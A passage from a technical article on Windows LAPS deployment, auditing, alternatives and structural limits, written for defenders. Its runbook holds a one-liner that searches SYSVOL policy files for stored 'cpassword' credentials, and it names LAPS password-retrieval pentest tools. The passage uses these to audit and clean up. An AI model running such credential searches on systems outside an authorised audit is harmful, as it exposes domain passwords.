&lt;td&gt;[@pingcastle-rules; @mitre-t1552-006]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows event 4662 on &lt;code&gt;msLAPS-*&lt;/code&gt; (SACL via &lt;code&gt;Set-LapsADAuditing&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Who read which LAPS attribute on which computer object, and when?&lt;/td&gt;
&lt;td&gt;[@ms-laps-set-adauditing; @ms-laps-ps-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Entra audit log + Graph &lt;code&gt;GET /directory/deviceLocalCredentials/{deviceId}&lt;/code&gt; reads&lt;/td&gt;
&lt;td&gt;Who retrieved which LAPS password from Microsoft Entra ID (&lt;code&gt;BackupDirectory = 1&lt;/code&gt;), and when?&lt;/td&gt;
&lt;td&gt;[@ms-graph-localcredinfo; @ms-laps-entra-scenarios]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;No Microsoft Defender for Identity alert in the current public taxonomy names LAPS specifically [@ms-defender-alerts]; instead, lean on the event 4662 SACL primitive plus advanced hunting in the &lt;code&gt;IdentityDirectoryEvents&lt;/code&gt; table for principal-pattern anomalies. Microsoft&apos;s Compromised Credentials and Lateral Movement categories surface the downstream behaviour when a stolen LAPS password gets used.&lt;/p&gt;
&lt;p&gt;{`
// In production, run: Get-LapsADPassword -Identity * | Where-Object {
//   $&lt;em&gt;.ExpirationTimestamp -lt (Get-Date) -or $&lt;/em&gt;.Source -eq &apos;Plaintext&apos;
// }
// This in-browser demo mirrors the same logic against an array of mock computer objects.&lt;/p&gt;
&lt;p&gt;const ONE_DAY_MS = 86400000;
const computers = [
  { name: &quot;WS-001&quot;, msLapsExpiry: Date.now() + 5 * ONE_DAY_MS, encrypted: true  },
  { name: &quot;WS-002&quot;, msLapsExpiry: Date.now() - 2 * ONE_DAY_MS, encrypted: true  },
  { name: &quot;WS-003&quot;, msLapsExpiry: null,                        encrypted: false },
  { name: &quot;WS-004&quot;, msLapsExpiry: Date.now() + 1 * ONE_DAY_MS, encrypted: false },
];&lt;/p&gt;
&lt;p&gt;const gaps = computers.flatMap(c =&amp;gt; {
  const issues = [];
  if (c.msLapsExpiry === null)           issues.push(&quot;no password stored&quot;);
  else if (c.msLapsExpiry &amp;lt; Date.now())  issues.push(&quot;expired (overdue rotation)&quot;);
  if (!c.encrypted)                      issues.push(&quot;plaintext (msLAPS-Password)&quot;);
  return issues.length ? [`${c.name}: ${issues.join(&quot;, &quot;)}`] : [];
});&lt;/p&gt;
&lt;p&gt;console.log(gaps.length === 0
  ? &quot;All computers have current, encrypted LAPS passwords&quot;
  : &quot;Coverage gaps:\n  &quot; + gaps.join(&quot;\n  &quot;));
`}&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;AdministratorAccountName&lt;/code&gt; decision deserves one paragraph of its own. On Server SKUs, the built-in Administrator (RID 500) is enabled by default, and leaving the policy empty manages it -- this is what most deployments want. On Client SKUs the built-in is disabled by default; many shops create a named admin account (a common convention is &lt;code&gt;lapsadmin&lt;/code&gt;) and set &lt;code&gt;AdministratorAccountName&lt;/code&gt; to that name. On Windows 11 24H2 and Windows Server 2025 and later, the better answer is Automatic Account Management: set &lt;code&gt;AutomaticAccountManagementEnabled = 1&lt;/code&gt;, &lt;code&gt;AutomaticAccountManagementRandomizeName = 1&lt;/code&gt;, and &lt;code&gt;AutomaticAccountManagementEnableAccount = 0&lt;/code&gt;, and the host will auto-create a randomised-name disabled-by-default local-admin account that Windows LAPS owns end to end [@ms-laps-account-modes]. The result is that an attacker enumerating local accounts cannot guess the LAPS-managed account name from RID 500, RID 1000, or any other predictable identifier.&lt;/p&gt;
&lt;p&gt;This is the baseline. But LAPS is not the only answer to &quot;who knows the local admin password.&quot; For three classes of fleet, the right answer is something else.&lt;/p&gt;
&lt;h2&gt;8. When LAPS Is Not the Right Tool&lt;/h2&gt;
&lt;p&gt;Three classes of fleet should not -- or should not &lt;em&gt;only&lt;/em&gt; -- run Windows LAPS. The first wants a workflow LAPS does not offer. The second wants no standing local admin at all. The third is orthogonal: it changes the in-session elevation surface without changing the recoverable break-glass.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-party Privileged Access Management (PAM) vaults.&lt;/strong&gt; Delinea Secret Server [@delinea-secretserver], CyberArk Endpoint Privilege Manager [@cyberark-epm], and BeyondTrust Password Safe are the dominant 2026 commercial offerings in the category. The case for running a PAM vault alongside (or instead of) Windows LAPS is rarely about cryptography and almost always about workflow. PAM vaults bring multi-factor authentication on checkout, full session recording, dual-approval gates for high-risk accounts, and cross-OS scope (Windows, macOS, Linux, network gear, hypervisors) under one ACL model. The total cost of ownership is higher than LAPS; the security model, properly deployed, is comparable. Many shops run both: Windows LAPS for the workstation floor, PAM for tier-0 break-glass with session recording. The split is a &lt;em&gt;workflow&lt;/em&gt; trade-off, not an architectural one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Zero standing local admin plus Entra PIM JIT elevation.&lt;/strong&gt; Tier-0 fleets that have reached the &quot;no routine local admin&quot; architectural state disable the built-in RID 500 entirely and gate every admin operation through just-in-time elevation. Microsoft Entra Privileged Identity Management [@ms-entra-pim] supports the eligibility / activation / approval workflow at scale: an operator is &lt;em&gt;eligible&lt;/em&gt; for an admin role, &lt;em&gt;activates&lt;/em&gt; it for a bounded duration with optional MFA and ticket reference, and an &lt;em&gt;approver&lt;/em&gt; signs off on the activation if policy requires. Windows LAPS coexists in this model as the absolute-last-resort break-glass mechanism -- for the case where Entra itself is down, the network is partitioned, and a human has to walk to a console and type a password. The architectural alignment is with MITRE T1078.001 (Default Accounts) [@mitre-t1078-001]: if the default account is permanently disabled and only re-enabled under PIM workflow, the entire technique class is bounded by the PIM activation log.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Windows 11 25H2 Administrator Protection.&lt;/strong&gt; Per-elevation transient admin sessions arrived as a Tech Community preview in late 2025 [@tc-admin-protection-win11]. The feature creates a temporary, isolated &quot;shadow admin&quot; identity for the duration of each elevation prompt, brokering UAC-class elevation through a per-elevation token that is destroyed when the elevated process exits. &lt;strong&gt;This is orthogonal to LAPS, not a replacement.&lt;/strong&gt; Administrator Protection addresses in-session UAC elevation; Windows LAPS addresses the recoverable break-glass password for off-network and non-bootable recovery. The two systems answer different questions. Conflating them produces designs that drop LAPS in favour of Administrator Protection and then discover, six months later, that there is no recovery primitive for a laptop the user has dropped off the corporate network for a year.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Situation&lt;/th&gt;
&lt;th&gt;Recommended method&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;On-premises AD-joined, no Entra ID&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;A&lt;/strong&gt; -- in-box Windows LAPS with AD backup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Entra hybrid-joined, on-prem AD authoritative&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;A&lt;/strong&gt; -- Microsoft&apos;s current hybrid recommendation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pure Entra-joined, no on-prem AD&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;B&lt;/strong&gt; -- in-box Windows LAPS with Entra ID backup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stuck on Windows Server 2016 (excluded from Windows LAPS)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;C&lt;/strong&gt; -- legacy MSI LAPS until OS migration completes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;In active migration from legacy LAPS to Windows LAPS&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;C&lt;/strong&gt; in side-by-side mode with different managed accounts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-Windows scope (Linux, macOS, network gear) needs unified vaulting&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;D&lt;/strong&gt; -- third-party PAM vault, often alongside A/B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Regulated industry requiring session recording / MFA checkout&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;D&lt;/strong&gt; alongside A/B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tier-0 fleet with a zero-standing-credential goal and Entra ID P2&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;E&lt;/strong&gt; -- PIM-gated JIT elevation layered on A or B&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows 11 fleet wanting in-session credential-theft mitigation&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;F&lt;/strong&gt; -- Administrator Protection alongside A/B (orthogonal)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BYOD, workgroup, or unmanaged endpoints&lt;/td&gt;
&lt;td&gt;None of A through F -- &lt;em&gt;enrollment&lt;/em&gt; is the answer, not LAPS&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart TD
    Start[&quot;Local-admin password problem for a fleet&quot;]
    BYOD{&quot;BYOD or unmanaged?&quot;}
    EnrollFirst[&quot;Enrollment is the answer, not LAPS&quot;]
    Join{&quot;AD-joined / hybrid / Entra-joined?&quot;}
    WS2016{&quot;Stuck on WS2016 or in migration?&quot;}
    Tier0{&quot;Tier 0 with zero-standing-credential goal?&quot;}
    CrossOS{&quot;Non-Windows scope or checkout workflow needed?&quot;}
    WinElev{&quot;Win 11 25H2 in-session elevation hardening?&quot;}
    MA[&quot;Method A: Windows LAPS, AD backup&quot;]
    MB[&quot;Method B: Windows LAPS, Entra backup&quot;]
    MC[&quot;Method C: legacy MSI LAPS&quot;]
    MD[&quot;Method D: PAM vault, alongside A/B&quot;]
    ME[&quot;Method E: PIM-gated JIT, layered on A/B&quot;]
    MF[&quot;Method F: Administrator Protection (orthogonal)&quot;]
    Start --&amp;gt; BYOD
    BYOD -- yes --&amp;gt; EnrollFirst
    BYOD -- no --&amp;gt; Join
    Join -- AD or hybrid --&amp;gt; MA
    Join -- pure Entra --&amp;gt; MB
    MA --&amp;gt; WS2016
    MB --&amp;gt; WS2016
    WS2016 -- yes --&amp;gt; MC
    WS2016 -- no --&amp;gt; Tier0
    Tier0 -- yes --&amp;gt; ME
    Tier0 -- no --&amp;gt; CrossOS
    CrossOS -- yes --&amp;gt; MD
    CrossOS -- no --&amp;gt; WinElev
    WinElev -- yes --&amp;gt; MF

The terminology is genuinely confusing. *Microsoft Entra hybrid joined* is a device join state: the workstation is joined to both an on-premises AD domain and Microsoft Entra ID, and both directories know about it. *Microsoft Entra hybrid runbook worker*, by contrast, is an Azure Automation primitive that runs Automation runbooks on a worker process inside an on-premises environment. They share a word and nothing else. Windows LAPS policy for hybrid-*joined* devices is a `BackupDirectory` choice (typically AD for on-prem-authoritative hybrid fleets, Entra for Entra-authoritative); Hybrid runbook workers are an Azure Automation concern and entirely outside the LAPS scope.
&lt;p&gt;All five answers above -- methods A through F -- have a structural ceiling. There is one bound none of them can break.&lt;/p&gt;
&lt;h2&gt;9. What LAPS Structurally Cannot Solve&lt;/h2&gt;
&lt;p&gt;Every recoverable-secret system has a privileged reader. Whether you call it &lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt;, a &quot;CyberArk vault admin,&quot; or a &quot;PIM eligible approver,&quot; somebody can break the glass -- which means somebody can compromise the glass. This is a lower bound, not an implementation defect.&lt;/p&gt;
&lt;p&gt;The eleven-year arc converged on a tight bound. It did not abolish the underlying problem. Four structural limits are worth naming, because each maps onto a real residual attack surface in 2026 deployments.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bound 1: at least one reader exists, by construction.&lt;/strong&gt; Symbolically, $|\text{readers}| \geq 1$. CNG DPAPI&apos;s group-key-protector substitution does not eliminate the privileged class; it relocates the trust boundary. The boundary moves from &quot;every principal with LDAP read on the attribute&quot; (legacy LAPS) to &quot;every principal in the configured &lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt; group at decryption time&quot; (Windows LAPS). The relocation tightens the bound by orders of magnitude in typical fleets -- a &lt;code&gt;LAPS-DPAPI-Decryptors&lt;/code&gt; group with five members beats an &quot;All Extended Rights on the helpdesk OU&quot; delegation with five hundred -- but it does not move the bound to zero. The directory that stores the LAPS secret remains a tier-0 asset, and the decryptor group remains a tier-0 principal class.&lt;/p&gt;

Every recoverable secret has a privileged reader. The architectural game is to make the reader class small, audited, time-bounded, and reachable from the directory only through Kerberos. The game is not to make the reader class empty. That game has no winning move.
&lt;p&gt;&lt;strong&gt;Bound 2: the out-of-protocol OPSEC tail.&lt;/strong&gt; Once a plaintext password leaves the directory -- pasted into a helpdesk ticket, screenshotted into a Slack DM, stored in a shared KeePass database that the team forgot to rotate -- the protocol&apos;s rotation knob is the only remaining mitigation. &lt;code&gt;PostAuthenticationActions&lt;/code&gt; only fires after the &lt;em&gt;next managed-account interactive logon&lt;/em&gt; [@ms-laps-policy-settings]; pre-logon exposure is bounded only by &lt;code&gt;PasswordAgeDays&lt;/code&gt;. A password screenshotted into a chat log at 10:14 AM and never used is the password on that endpoint for the remainder of the configured rotation window, regardless of whether anyone has noticed the leak. The protocol does not, and cannot, solve &quot;the password is now in a chat log.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bound 3: unmanaged and BYOD endpoints.&lt;/strong&gt; A machine that is neither AD-joined nor Microsoft Intune-managed has no LAPS policy applied to it. Personal-device BYO MAM scope is outside the LAPS protection model entirely. The fix for these endpoints is enrollment, not LAPS. A non-trivial portion of the residual local-admin-password risk in 2026 is concentrated on the long tail of unmanaged endpoints that exist precisely because management was politically or contractually infeasible. The protocol does not solve this; &lt;em&gt;governance&lt;/em&gt; solves this.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bound 4: verification asymmetry.&lt;/strong&gt; The directory&apos;s audit log says what it &lt;em&gt;chose&lt;/em&gt; to log. An unprivileged observer cannot verify enforcement from outside the directory. This is the structural ceiling that motivates external audit primitives -- PingCastle [@pingcastle-rules], BloodHound [@bloodhound-edge-readlaps], Defender for Identity [@ms-defender-alerts] -- because they sit outside the directory&apos;s own self-report. The bound cannot be closed inside the protocol; only an out-of-band attestation primitive can certify enforcement to a party that does not trust the directory.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Somebody has to break the glass. The decryptor group is the new tier-0 asset; LAPS bounds the problem, it does not abolish it. The eleven-year arc was a convergence on a tighter bound, not an arrival at a clean answer. The right framing for the 2026 baseline is &quot;the residual attack surface is now the &lt;em&gt;actual&lt;/em&gt; attack surface, rather than an artefact of incomplete shipping.&quot; That is real progress -- it just is not closure.&lt;/p&gt;
&lt;/blockquote&gt;

A structurally tighter design would have three properties: threshold cryptography so no single principal can decrypt (an $m$-of-$n$ Shamir secret-sharing scheme over the password protector, with $m \geq 2$ in tier-0 fleets); attestation-bound retrieval so the decryptor&apos;s device state is part of the decryption policy (Azure Managed HSM&apos;s secure-key-release policy grammar [@ms-mhsm-policy-grammar] is the closest shipping primitive that approaches this -- a key-release decision conditioned on attestation claims like `x-ms-attestation-type` or `tee:sevsnpvm`); and a ledger-of-reads so every retrieval is recorded on a tamper-evident substrate that the directory itself cannot rewrite (Azure Confidential Ledger [@ms-conf-ledger] is the closest shipping primitive on the Microsoft side). None of these three are wired into Windows LAPS in 2026. Each exists as an adjacent Microsoft product. The architectural integration -- a Windows LAPS that requires two `LAPS-DPAPI-Decryptors` members to co-sign a retrieval, attests the retrieving device&apos;s state at decryption time, and writes the retrieval event to an append-only ledger the directory cannot edit -- is engineering work that nobody has shipped.
&lt;p&gt;Some of those structural bounds map onto open problems with no clean 2026 answer. We close on six of them.&lt;/p&gt;
&lt;h2&gt;10. Open Problems in 2026&lt;/h2&gt;
&lt;p&gt;Six open problems in local-admin password management for which no first-party Microsoft answer ships in 2026. Each is one paragraph, framed as &quot;what is the question,&quot; &quot;what has been tried,&quot; and &quot;what is the current best partial result.&quot;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Open question&lt;/th&gt;
&lt;th&gt;What has been tried&lt;/th&gt;
&lt;th&gt;Current best partial result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Legacy SYSVOL &lt;code&gt;cpassword&lt;/code&gt; cleanup at scale&lt;/td&gt;
&lt;td&gt;MS14-025 (UI disable, no remediation); PingCastle scanning; community &lt;code&gt;Get-GPPDeployedPasswords&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Third-party scan-and-manual-delete; no first-party cmdlet ships in the OS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-tenant / cross-directory LAPS coverage report&lt;/td&gt;
&lt;td&gt;Microsoft Intune compliance reports; manual &lt;code&gt;Get-LapsADPassword&lt;/code&gt; and &lt;code&gt;Get-LapsAADPassword&lt;/code&gt; joins&lt;/td&gt;
&lt;td&gt;DIY KQL across two directories; no unified portal report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid-joined &lt;code&gt;BackupDirectory&lt;/code&gt; ambiguity&lt;/td&gt;
&lt;td&gt;Microsoft Learn guidance (&quot;AD for hybrid&quot;)&lt;/td&gt;
&lt;td&gt;Most shops configure both and reconcile downstream&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Win 11 25H2 Administrator Protection and LAPS interaction&lt;/td&gt;
&lt;td&gt;Tech Community guidance; Microsoft Learn architectural notes&lt;/td&gt;
&lt;td&gt;Operate them as orthogonal, with no architectural integration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LDAP channel binding / signing enforcement migration&lt;/td&gt;
&lt;td&gt;Microsoft KB4520412 enforcement push 2020-2024; cross-platform tool updates&lt;/td&gt;
&lt;td&gt;Some Linux pentest tooling still incomplete; &lt;code&gt;bloodyAD&lt;/code&gt; / &lt;code&gt;lapsv2decrypt&lt;/code&gt; lead the field [@kb4520412-canonical]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Retrieval-event audit gap (cross-directory)&lt;/td&gt;
&lt;td&gt;Event 4662 SACL via &lt;code&gt;Set-LapsADAuditing&lt;/code&gt;; Entra audit log; Defender for Identity hunting&lt;/td&gt;
&lt;td&gt;DIY KQL unification across AD + Entra; no unified audit pane&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;1. Legacy SYSVOL cpassword cleanup at scale.&lt;/strong&gt; MS14-025 disabled new authoring twelve years ago; it never deleted what it patched [@ms14-025-bulletin]. No first-party &lt;code&gt;Find-GPPPassword&lt;/code&gt; or &lt;code&gt;Remove-GPPPassword&lt;/code&gt; cmdlet ships in the OS in 2026. PingCastle&apos;s &lt;code&gt;A-PwdGPO&lt;/code&gt; rule and Semperis Purple Knight&apos;s equivalent scanner fill the gap [@pingcastle-rules]. The 2026 answer is: scan with a third-party tool, rotate the discovered credentials in whatever account-management primitive owns them, then delete the XML. The open question is why Microsoft has not shipped this in the twelve years since the bulletin. The blast-radius argument from 2014 -- &quot;we cannot risk auto-deleting policy XMLs from SYSVOL&quot; -- is now strictly weaker than the cleanup-tail argument that the residual artefacts keep showing up on internal pentest reports a decade later.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Cross-tenant and cross-directory LAPS coverage view.&lt;/strong&gt; No portal-level &quot;every Entra-joined and every AD-joined device that does not have a current LAPS password&quot; report exists. Microsoft Intune compliance reports help on the Intune-managed side; &lt;code&gt;Get-LapsADPassword -Identity *&lt;/code&gt; covers the AD side; &lt;code&gt;Get-LapsAADPassword&lt;/code&gt; covers the Entra side. There is no single pane that unifies them. The 2026 answer is custom KQL or PowerShell that joins the three result sets on a normalised device identifier. The bottleneck is identity: Intune device IDs, AD &lt;code&gt;objectGuid&lt;/code&gt; values, and Entra &lt;code&gt;deviceId&lt;/code&gt; values are three different surrogate keys, and a fleet&apos;s mapping table is its own engineering investment.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Hybrid-joined &lt;code&gt;BackupDirectory&lt;/code&gt; ambiguity.&lt;/strong&gt; Microsoft Learn&apos;s current guidance is that hybrid-joined devices should typically use &lt;code&gt;BackupDirectory = 2&lt;/code&gt; (AD) when on-premises AD is the canonical identity store, and may use &lt;code&gt;BackupDirectory = 1&lt;/code&gt; (Entra) when Intune is the primary policy-delivery mechanism [@ms-laps-entra-scenarios]. In practice, the documentation hedges, and many shops configure both directions (one via GPO, one via Intune CSP) and rely on the per-device evaluation order to pick one. The result is a coverage-verification problem: a device that is &quot;configured for AD backup&quot; by GPO and &quot;configured for Entra backup&quot; by CSP can end up with the password in either backend, and the source of truth depends on policy precedence rules most operators do not memorise.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Windows 11 25H2 Administrator Protection and LAPS interaction.&lt;/strong&gt; Administrator Protection&apos;s per-elevation transient admin tokens and Windows LAPS&apos;s recoverable break-glass password are operationally adjacent but architecturally disjoint [@tc-admin-protection-win11]. The documentation covers each feature on its own; the interaction matrix -- &quot;what does a LAPS-managed RID 500 look like under Administrator Protection on a Win 11 25H2 host&quot; -- is not laid out in one place. Tier-0 architects who want both behaviours have to assemble the answer from two product pages.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. LDAP channel binding and signing enforcement migration.&lt;/strong&gt; Microsoft has been hardening LDAP channel binding through a multi-year 2020-2024 enforcement push tracked under KB4520412 [@kb4520412-canonical]. The original March 10, 2020 update introduced Channel Binding Token (CBT) signing events 3039, 3040, and 3041; the manual enablement step was removed on November 14, 2023 for Windows Server 2022 and on January 9, 2024 for Windows Server 2019, after which the hardening became the default posture; starting with Windows Server 2022 23H2, all new versions ship with the full set of changes in the KB applied [@kb4520412-canonical]. Tooling that does not speak LDAPS-with-channel-binding will break when enforcement reaches its terminal state. Modern attack-graph tooling -- &lt;code&gt;bloodyAD&lt;/code&gt; [@bloodyad-repo] and the &lt;code&gt;lapsv2decrypt&lt;/code&gt; reference implementation [@lapsv2decrypt-repo] -- has tracked the changes. Not every Linux pentest stack has. Practitioners building Linux-based LAPS retrieval pipelines should validate their stack against the channel-binding-required posture before the enforcement wave reaches them.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. The retrieval-event audit gap (cross-directory).&lt;/strong&gt; Active Directory does not natively log every read of &lt;code&gt;msLAPS-EncryptedPassword&lt;/code&gt;; &lt;code&gt;Set-LapsADAuditing&lt;/code&gt; installs a SACL that emits Directory Service event 4662 for configured attribute reads [@ms-laps-set-adauditing]. Microsoft Entra ID logs LAPS retrieval through its own audit log, surfaced via the Graph endpoint [@ms-graph-localcredinfo]. The two log streams have different schemas, different timestamp normalisations, and different principal identifiers. Cross-pane unification of &quot;who read which LAPS password when&quot; across both backends is a DIY engineering problem in 2026. Microsoft Defender for Identity surfaces some of the AD-side reads under the Compromised Credentials and Lateral Movement categories [@ms-defender-alerts] but does not name LAPS specifically in the public alert taxonomy.&lt;/p&gt;
&lt;p&gt;The threshold-cryptography open problem (an $m$-of-$n$ Shamir scheme over the LAPS password protector, with $m \geq 2$ in tier-0 fleets) is theoretically closed by the 1979 Shamir secret-sharing construction. The deployment-side block is that no Microsoft-shipped primitive wires the construction to the LAPS rotation pipeline. Adjacent shipping primitives (Azure Managed HSM key-release [@ms-mhsm-policy-grammar], Azure Confidential Ledger [@ms-conf-ledger]) exist on the Azure side, but the integration with on-premises LAPS clients is not on any public roadmap. The companion posts on DPAPI internals (#20) and Defender for Identity (#87) cover adjacent territory but do not close this gap.&lt;/p&gt;
&lt;p&gt;None of those six dissolves the architectural lesson the eleven-year arc taught: the right defaults take a decade to ship. Here is the practitioner field manual for the meantime.&lt;/p&gt;
&lt;h2&gt;11. Practitioner Field Manual and FAQ&lt;/h2&gt;
&lt;p&gt;What follows is a seven-step deployment list, three named sidebars that surface the most common misconceptions, and a seven-question FAQ. Lift the step list verbatim into your deployment runbook; the sidebars exist because the article would not be defensible without them.&lt;/p&gt;
&lt;h3&gt;The audit-and-migrate seven-step list&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Audit SYSVOL for &lt;code&gt;cpassword&lt;/code&gt; first.&lt;/strong&gt; Run PingCastle&apos;s &lt;code&gt;A-PwdGPO&lt;/code&gt; (MITRE T1552.006) [@pingcastle-rules; @mitre-t1552-006] before touching anything else. A Windows triage one-liner -- &lt;code&gt;findstr /s /i cpassword \\domain\SYSVOL\*.xml&lt;/code&gt; -- will land on most environments in under a minute. Remediate the discovered XML files (rotate the underlying account passwords, then delete the XMLs) before deploying Windows LAPS so the attack surface and the defence are not co-evolving in the same window.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Extend the AD schema for Windows LAPS.&lt;/strong&gt; Run &lt;code&gt;Update-LapsADSchema&lt;/code&gt; once per forest from a Domain Admin context. The cmdlet is idempotent and coexists with the legacy &lt;code&gt;ms-Mcs-AdmPwd&lt;/code&gt; attribute on the same &lt;code&gt;Computer&lt;/code&gt; object [@ms-laps-mig-scenarios].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Delegate.&lt;/strong&gt; Run &lt;code&gt;Set-LapsADComputerSelfPermission&lt;/code&gt; on each target OU so that computer accounts can write their own &lt;code&gt;msLAPS-*&lt;/code&gt; attributes. Audit existing &quot;All Extended Rights&quot; delegations with &lt;code&gt;Find-LapsADExtendedRights&lt;/code&gt; and remove any that do not have an explicit operational justification [@ms-laps-ps-overview]. This is the legacy-LAPS lesson applied to the new attribute set.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure encryption-at-rest.&lt;/strong&gt; Verify that the forest&apos;s Domain Functional Level is Windows Server 2016 or higher. Configure &lt;code&gt;ADPasswordEncryptionEnabled = 1&lt;/code&gt; &lt;em&gt;explicitly&lt;/em&gt; even though the default is True -- the explicit configuration makes the choice visible in policy audits and forces the operator to verify the DFL prerequisite [@ms-laps-policy-settings]. Assign &lt;code&gt;ADPasswordEncryptionPrincipal&lt;/code&gt; to a dedicated &lt;code&gt;LAPS-DPAPI-Decryptors&lt;/code&gt; group, not Domain Admins [@ms-laps-concepts-overview].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deploy policy.&lt;/strong&gt; GPO for AD-joined, Intune CSP for Entra-joined and hybrid-joined [@ms-laps-csp]. Settings as per section 7&apos;s baseline table. Validate via &lt;code&gt;Get-LapsADPassword -Identity &amp;lt;computer&amp;gt;&lt;/code&gt; against a representative sample of hosts after the first one-hour rotation timer has fired [@ms-laps-get-adpassword].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Migrate from legacy LAPS.&lt;/strong&gt; Use the documented coexistence pattern: the legacy MSI&apos;s CSE keeps running against the built-in RID 500, the new in-box LAPS takes over against a named secondary local-admin account, then retire the legacy &lt;code&gt;ms-Mcs-AdmPwd&lt;/code&gt; schema readers and uninstall the MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The legacy MSI&apos;s installation is blocked on Windows 11 23H2 and later [@ms-laps-msi-download].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Continuous audit.&lt;/strong&gt; PingCastle for coverage rules (&lt;code&gt;A-LAPS-Not-Installed&lt;/code&gt;, &lt;code&gt;A-LAPS-Joined-Computers&lt;/code&gt;, and the GPP &lt;code&gt;A-PwdGPO&lt;/code&gt;) [@pingcastle-rules]; BloodHound for the &lt;code&gt;ReadLAPSPassword&lt;/code&gt; edge across the graph [@bloodhound-edge-readlaps]; Defender for Identity for downstream behaviour under Compromised Credentials and Lateral Movement [@ms-defender-alerts]; and a custom KQL on the Entra audit log for &lt;code&gt;LapsPasswordRetrieved&lt;/code&gt; events. None of these is optional in a deployment that intends to detect compromise.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Sidebar A: MS16-072 is NOT the LAPS attribute-readability bulletin&lt;/h3&gt;
&lt;p&gt;A recurring misattribution credits MS16-072 / KB3163622 / CVE-2016-3223 (June 14, 2016) [@ms16-072-bulletin; @ms16-072-kb; @cve-2016-3223] with closing the legacy LAPS attribute-readability issue. It does not. MS16-072 is a Group Policy retrieval-context fix: it moved user-side GPO fetch into the &lt;em&gt;computer&apos;s&lt;/em&gt; security context to defeat a man-in-the-middle class on policy traffic. The actual LAPS attribute-readability issue -- &quot;All Extended Rights&quot; delegations silently including &lt;code&gt;CONTROL_ACCESS&lt;/code&gt; on the CONFIDENTIAL &lt;code&gt;ms-Mcs-AdmPwd&lt;/code&gt; attribute -- has no Microsoft-assigned CVE or bulletin. The canonical write-up is Sean Metcalf&apos;s August 2016 ADSecurity piece [@adsec-laps-2016], and the operational primitive is SpecterOps&apos;s &lt;code&gt;ReadLAPSPassword&lt;/code&gt; BloodHound edge [@bloodhound-edge-readlaps].&lt;/p&gt;
&lt;h3&gt;Sidebar B: &quot;Hybrid joined&quot; is not &quot;Hybrid Worker&quot;&lt;/h3&gt;
